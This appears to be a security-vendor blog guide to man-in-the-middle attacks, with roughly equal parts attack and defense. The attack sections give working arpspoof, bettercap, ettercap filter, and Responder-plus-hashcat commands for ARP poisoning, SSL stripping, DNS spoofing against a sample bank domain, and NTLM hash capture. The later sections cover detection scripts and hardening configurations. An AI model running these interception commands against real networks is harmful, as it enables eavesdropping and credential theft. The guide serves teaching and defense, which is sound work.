Network traffic rarely travels in a straight line. Between your browser and a bank's server sit routers, switches, proxies, and DNS resolvers, any one of which can be silently compromised or impersonated. A man-in-the-middle (MITM) attack exploits exactly this reality: an adversary positions themselves between two communicating parties, reads or modifies traffic in transit, and often leaves no obvious trace on either endpoint.
This guide breaks down how MITM attacks work at the protocol level, what real-world attack tooling looks like, and how defenders can detect and prevent interception before sensitive data is exposed.
A man-in-the-middle attack occurs when a third party secretly intercepts, relays, and potentially alters communications between two endpoints that believe they are talking directly to each other. The attacker does not need to break encryption outright. Instead, they manipulate the trust mechanisms that establish encrypted channels in the first place.
MITM attacks can occur at multiple layers of the OSI model:
Understanding the layer at which an attack operates determines which detection and prevention controls apply.
Address Resolution Protocol (ARP) has no authentication mechanism. An attacker on a local network can broadcast fraudulent ARP replies, associating their MAC address with a legitimate IP address, typically the default gateway. All traffic intended for that gateway then flows through the attacker's machine.
# Using arpspoof from dsniff to poison a target's ARP cache
# Redirect traffic from 192.168.1.50 toward the attacker, pretending to be the gateway
arpspoof -i eth0 -t 192.168.1.50 192.168.1.1
# Run simultaneously in a second terminal to also poison the gateway
arpspoof -i eth0 -t 192.168.1.1 192.168.1.50
[cta]
With both directions poisoned, the attacker enables IP forwarding so traffic is still relayed to its destination, keeping the session alive while all packets pass through attacker-controlled memory.
# Enable IP forwarding so intercepted traffic is still delivered
echo 1 > /proc/sys/net/ipv4/ip_forward
[cta]
SSL stripping, first demonstrated by Moxie Marlinspike, downgrades HTTPS connections to plain HTTP by intercepting the initial HTTP request before the client ever negotiates TLS. The attacker maintains a legitimate HTTPS session with the server while serving unencrypted HTTP to the victim.
# bettercap SSL strip module
sudo bettercap -iface eth0
# Inside the bettercap interactive console:
set arp.spoof.targets 192.168.1.50
arp.spoof on
set http.proxy.sslstrip true
http.proxy on
net.sniff on
[cta]
The victim's browser may show HTTP in the address bar, but many users do not notice the missing padlock, particularly on mobile devices.
DNS queries are typically unencrypted and unauthenticated. An attacker who has already achieved ARP-level interception can intercept DNS queries and respond with forged records, redirecting victims to attacker-controlled servers.
# bettercap DNS spoofing
set dns.spoof.domains targetbank.com,mail.targetbank.com
set dns.spoof.address 192.168.1.99
dns.spoof on
[cta]
Combined with a convincing phishing page and a valid TLS certificate issued for a lookalike domain, this technique bypasses browser warnings entirely.
On corporate networks, this is legitimate functionality used by DLP and web filtering appliances. In adversarial hands, the same technique allows full TLS decryption. The attacker generates a self-signed root certificate and, if they have access to the endpoint (or through a phishing attack), installs it in the system trust store.
# Generate a rogue CA with mitmproxy
mitmproxy --mode transparent --ssl-insecure
# Or with a custom CA cert for interception
mitmproxy --certs *=/path/to/rogue-ca.pem --mode transparent
[cta]
mitmproxy can log all decrypted traffic, modify responses in flight, and inject JavaScript into HTML pages, making it one of the most capable tools in an MITM toolkit.
At the internet routing level, BGP hijacking occurs when an autonomous system (AS) advertises prefixes it does not own, attracting traffic meant for another network. This has been used in high-profile incidents to redirect traffic for cryptocurrency services, banking infrastructure, and government networks. BGP hijacking is primarily a nation-state and ISP-level threat, but understanding it matters for organizations designing resilient architectures.
Security professionals and red teamers use a range of tools to simulate MITM conditions during authorized engagements. If you want hands-on experience with these tools in a structured lab environment, the courses at Redfox Cybersecurity Academy walk through real network attack and defense scenarios with guided exercises.
Bettercap is a modular, actively maintained network attack framework that handles ARP spoofing, DNS spoofing, SSL stripping, and traffic capture in a single interactive session.
# Full MITM setup with bettercap caplet (scripted session)
# Save the following as mitm.cap
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.1.0/24
arp.spoof on
set net.sniff.verbose true
net.sniff on
set dns.spoof.all true
set dns.spoof.address 192.168.1.99
dns.spoof on
# Run the caplet
sudo bettercap -iface eth0 -caplet mitm.cap
[cta]
Ettercap is a classic MITM tool with plugin support for credential harvesting, filter injection, and protocol dissection.
# Ettercap text-mode ARP MITM between gateway and target
sudo ettercap -T -M arp:remote /192.168.1.1// /192.168.1.50//
# With a filter to downgrade HTTPS to HTTP in HTML responses
sudo ettercap -T -M arp:remote -F strip_https.ef /192.168.1.1// /192.168.1.50//
[cta]
An Ettercap filter for content injection is compiled with etterfilter and looks like this:
# strip_https.ecf -- inject a redirect into HTTP responses
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "https://")) {
replace("https://", "http://");
msg("SSL stripped in response\n");
}
}
etterfilter strip_https.ecf -o strip_https.ef
[cta]
On Windows-heavy networks, Responder poisons LLMNR, NBT-NS, and MDNS name resolution broadcasts, capturing NTLMv2 challenge-response hashes when clients attempt to authenticate to attacker-controlled shares.
# Start Responder on the interface connected to the target network
sudo responder -I eth0 -rdw
# Captured hashes appear in /usr/share/responder/logs/
# Crack with hashcat
hashcat -m 5600 captured_hashes.txt /usr/share/wordlists/rockyou.txt
[cta]
Responder is not traditional MITM in the network interception sense, but it exploits the same trust gap in broadcast-based name resolution and frequently leads to full domain compromise.
Detection requires visibility at multiple layers. A single control is rarely sufficient.
On individual hosts, comparing the ARP cache against known mappings reveals spoofing.
# Check the local ARP table on Linux
arp -n
# Look for duplicate MAC addresses assigned to different IPs,
# or the gateway IP mapped to an unexpected MAC
ip neigh show
[cta]
A defender's script can alert when the gateway MAC changes:
#!/bin/bash
KNOWN_GW_MAC="aa:bb:cc:dd:ee:ff"
GATEWAY_IP="192.168.1.1"
CURRENT_MAC=$(arp -n | grep "$GATEWAY_IP" | awk '{print $3}')
if [ "$CURRENT_MAC" != "$KNOWN_GW_MAC" ]; then
echo "ALERT: Gateway MAC changed to $CURRENT_MAC" | mail -s "Possible ARP Spoof" soc@company.com
fi
[cta]
At the network level, tools like arpwatch maintain a persistent log of IP-to-MAC mappings and alert on changes.
sudo apt install arpwatch
sudo arpwatch -i eth0
# Logs to syslog; integrate with SIEM for alerting
[cta]
When SSL stripping or rogue CA attacks are active, TLS certificates may exhibit anomalies: unexpected issuers, recently generated certificates, or mismatched subject alternative names (SANs).
# Inspect the certificate chain for a site using openssl
openssl s_client -connect targetsite.com:443 -showcerts 2>/dev/null | openssl x509 -noout -text | grep -E "Issuer|Subject|Not Before|Not After|DNS:"
[cta]
Organizations should monitor certificate transparency (CT) logs for unauthorized certificates issued for their domains using tools like certspotter or the crt.sh API.
# Query crt.sh for certificates issued for a domain
curl -s "https://crt.sh/?q=%25.yourdomain.com&output=json" | jq '.[].name_value' | sort -u
[cta]
Enroll your domain in a CT monitoring service and alert on any certificate not issued through your approved CA. This is a low-cost, high-value detection control that many organizations overlook.
Unusual traffic patterns can indicate active interception. Wireshark and Zeek are the primary tools for deep packet inspection in lab and enterprise environments respectively.
# Capture and filter for ARP anomalies in Wireshark via CLI tshark
tshark -i eth0 -Y "arp.duplicate-address-detected or arp.duplicate-address-frame" -w arp_anomalies.pcap
[cta]
# Zeek script to detect duplicate ARP replies
# Save as detect_arp_spoof.zeek
event arp_reply(mac_src: string, mac_dst: string, SPA: addr, SHA: string, TPA: addr, THA: string) {
if ( SPA in arp_cache && arp_cache[SPA] != SHA ) {
print fmt("ARP spoof detected: %s claimed by %s, previously %s", SPA, SHA, arp_cache[SPA]);
}
arp_cache[SPA] = SHA;
}
[cta]
Zeek integrates well with Elastic Stack and Splunk, making it a standard component of network security monitoring (NSM) architectures. Understanding how to read and write Zeek scripts is covered in depth in the network defense modules at Redfox Cybersecurity Academy.
In browsers and mobile applications, HTTP Strict Transport Security (HSTS) preloading and certificate pinning force clients to reject unexpected certificates. Monitoring application logs for TLS handshake failures or pinning violations can surface active MITM attempts targeting mobile apps and API clients.
Add your domain to the HSTS preload list at hstspreload.org. This instructs all major browsers to refuse HTTP connections and reject invalid certificates for your domain, regardless of what the network says.
# Nginx HSTS header with 2-year max-age and preload flag
add_header Strict-Transport-Security "max-age=63072000; includeSubDomains; preload" always;
[cta]
DNSSEC adds cryptographic signatures to DNS records, preventing forged responses. DNS over HTTPS (DoH) encrypts DNS queries end-to-end, removing the interception surface entirely.
# Test DNSSEC validation for a domain
dig +dnssec yourdomain.com
# Check if the AD (Authenticated Data) flag is present in the response
# AD flag confirms DNSSEC validation passed
[cta]
For internal resolvers, configuring DoH on endpoints prevents DNS spoofing even when the attacker has achieved Layer 2 interception.
On Cisco and similar managed switches, DAI validates ARP packets against a DHCP snooping binding table, dropping replies that do not match known IP-to-MAC associations.
! Cisco IOS - Enable DHCP snooping and DAI on VLAN 10
ip dhcp snooping
ip dhcp snooping vlan 10
ip arp inspection vlan 10
ip arp inspection validate src-mac dst-mac ip
! Mark uplinks to trusted switches or routers as trusted
interface GigabitEthernet0/1
ip dhcp snooping trust
ip arp inspection trust
[cta]
This single control eliminates most LAN-based ARP spoofing at the hardware level and should be standard on any managed network.
In microservices architectures, mTLS ensures both the client and the server present certificates signed by a trusted CA. An attacker who intercepts the connection cannot forge either side without access to both private keys.
# Example: Istio service mesh mTLS policy (Kubernetes)
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
name: default
namespace: production
spec:
mtls:
mode: STRICT
[cta]
Flat networks are a prerequisite for lateral MITM attacks. Segmenting networks by function (workstations, servers, IoT, guest) using VLANs and firewall rules limits the blast radius of any single compromised host.
Zero trust architecture removes implicit trust based on network location entirely. Every request is authenticated, authorized, and encrypted regardless of whether it originates inside or outside the perimeter. For organizations building zero trust implementations, the practical labs at Redfox Cybersecurity Academy cover network segmentation, identity-aware proxies, and microsegmentation strategies using real enterprise tooling.
On untrusted networks, all traffic should traverse an encrypted tunnel. WireGuard has largely replaced older IPSec and OpenVPN deployments for its simplicity, performance, and modern cryptography.
# WireGuard interface configuration on a client
[Interface]
PrivateKey = <client_private_key>
Address = 10.0.0.2/32
DNS = 10.0.0.1
[Peer]
PublicKey = <server_public_key>
AllowedIPs = 0.0.0.0/0
Endpoint = vpn.company.com:51820
PersistentKeepalive = 25
[cta]
With AllowedIPs = 0.0.0.0/0, all traffic is routed through the VPN, preventing local network interception regardless of the attacker's position on the LAN.
Man-in-the-middle attacks are not a single technique but a broad class of interception methods that span every layer of the network stack. The common thread is trust exploitation: ARP has no authentication, DNS historically had no verification, and TLS trust relies on a certificate authority ecosystem that can be subverted.
Effective defense combines protocol hardening (HSTS preloading, DNSSEC, mTLS), network-level controls (DAI, DHCP snooping, VLAN segmentation), and continuous monitoring (arpwatch, CT log monitoring, Zeek-based NSM). No single control is sufficient on its own.
For practitioners who want to go beyond theory and work through these attacks and defenses in a structured lab environment, the courses at Redfox Cybersecurity Academy cover network penetration testing, traffic analysis, and enterprise defense architecture with hands-on scenarios built around real-world tooling.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
